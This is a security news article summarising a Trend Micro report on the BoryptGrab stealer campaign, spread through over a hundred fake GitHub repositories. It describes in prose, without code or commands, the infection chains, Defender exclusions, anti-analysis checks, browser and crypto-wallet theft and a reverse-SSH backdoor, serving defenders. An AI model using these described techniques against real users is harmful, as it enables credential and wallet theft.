Trend Micro found BoryptGrab stealer spreading through 100+ GitHub repositories, stealing browser data, crypto wallets, system information, and user files.
Trend Micro uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories.
BoryptGrab is designed to collect browser and cryptocurrency wallet data, system details, and common files. Some variants also deploy a PyInstaller backdoor called TunnesshClient, which creates a reverse SSH tunnel to communicate with attackers.
The malware is distributed via ZIP archives posing as software tools and game cheats, linked to over 100 GitHub repositories.
“By tracing the infection chain, we were able to observe several ZIP archive files in the wild (all with similar naming conventions) that masquerade as common software tools (including gaming cheat hacks).” reads the report published by Trend Micro. “As the “github-io” patterns in some ZIP file names suggest, searching for the software tool patterns leads to over a hundred public Github repositories delivering malware.”
Evidence such as Russian-language comments and infrastructure suggests the threat actors may have a Russian origin.
Attackers spread the malware through public GitHub repositories that pose as free software tools, game cheats, or utilities.
They stuff README files with SEO keywords so search engines rank the malicious repositories near legitimate results. One example mimics a Voicemod Pro download page and links to a GitHub-hosted site that looks like a normal project directory.
The page contains Russian comments and redirects visitors through a chain of encoded URLs until it reaches a fake download page that generates a ZIP archive containing the malware. Many repositories reuse the same logic and sometimes send tracking data to the attackers.
The downloaded ZIP files launch the infection through several methods. In one route, an executable side-loads a malicious libcurl.dll that decrypts a hidden launcher payload.
The launcher downloads the BoryptGrab information stealer and may also retrieve other payloads, including Vidar variants, a PyInstaller backdoor called TunnesshClient, and a Golang downloader named HeaconLoad. The launcher uses build names such as Shrek, Leon, or CryptoByte to request specific payloads and sets scheduled tasks to keep the malware running.
“Some launcher payload variants contain build names (with some differing from each other) . The launcher payload passes the build name as the “-b” argument when executing the BoryptGrab stealer it downloads.” continue the report.
Another infection path uses a VBS downloader that hides commands inside integer arrays. The script decodes PowerShell commands, downloads a launcher from a remote server, and can even add Microsoft Defender exclusions to avoid detection. That launcher then retrieves the BoryptGrab stealer and other tools from the attacker’s infrastructure.
In some variants, a .NET loader or embedded scripts trigger the same process, while others include the HeaconLoad downloader directly. HeaconLoad maintains persistence with registry entries and scheduled tasks, sends system information to a command-and-control server, and downloads additional bundles when available.
Several payloads rely on obfuscation techniques such as XOR-encrypted strings, dynamic API resolution, and code injection. Russian-language comments and log messages appear throughout the infrastructure and malware samples, suggesting the operators likely have a Russian background.
BoryptGrab is a C/C++ information stealer designed to collect large amounts of sensitive data from infected systems. The malware accepts optional command-line arguments such as –output-path to define where stolen data will be stored and –build-name to tag collected information. If attackers do not provide a build name, the malware uses a default value or relies on hardcoded identifiers such as CryptoByte, Shrek, Sonic, or Yaropolk, which help operators track infections.
Before collecting data, BoryptGrab performs anti-analysis checks.
“BoryptGrab detects whether it is executed in a virtual machine environment by querying registry entries and checking VM-related files. As part of its anti-analysis check, BoryptGrab also compares the names of running processes against a predefined list. It also attempts to execute with elevated privilege.” continues the report. “When the “–output-path”/”-o” argument is not given, BoryptGrab formats a default output path name using the current time, public IP address, and country code. Later, a directory with this output path name is created to stage collected data.”
It searches for signs of virtual machines, scans running processes against a predefined list, and attempts to gain elevated privileges. If no output path is specified, it creates a directory using the current time, public IP address, and country code to store stolen data.
The stealer targets data from many browsers, including Chrome, Edge, Firefox, Opera, Brave, Vivaldi, and Yandex. It uses techniques from public GitHub tools designed to bypass Chrome’s App-Bound Encryption and decrypt stored browser credentials. The malware loads an encrypted internal payload that extracts saved passwords and records installed applications.
BoryptGrab also downloads a helper tool to assist with Chromium-based browser extraction. Beyond browser data, it steals information from numerous desktop cryptocurrency wallets such as Exodus, Electrum, Ledger Live, Atomic, Binance, Wasabi, and Trezor. It captures screenshots, gathers system details, and includes a “file grabber” module that collects files with specific extensions from common directories. The malware also extracts Telegram files, browser passwords, and in newer variants, Discord tokens.
After gathering the data, BoryptGrab compresses and uploads the archive to the attacker’s server. Some variants also download TunnesshClient, a PyInstaller backdoor that establishes a reverse SSH tunnel, allowing attackers to run commands, move files, and use the infected system as a proxy.
“The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories.” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, malware)
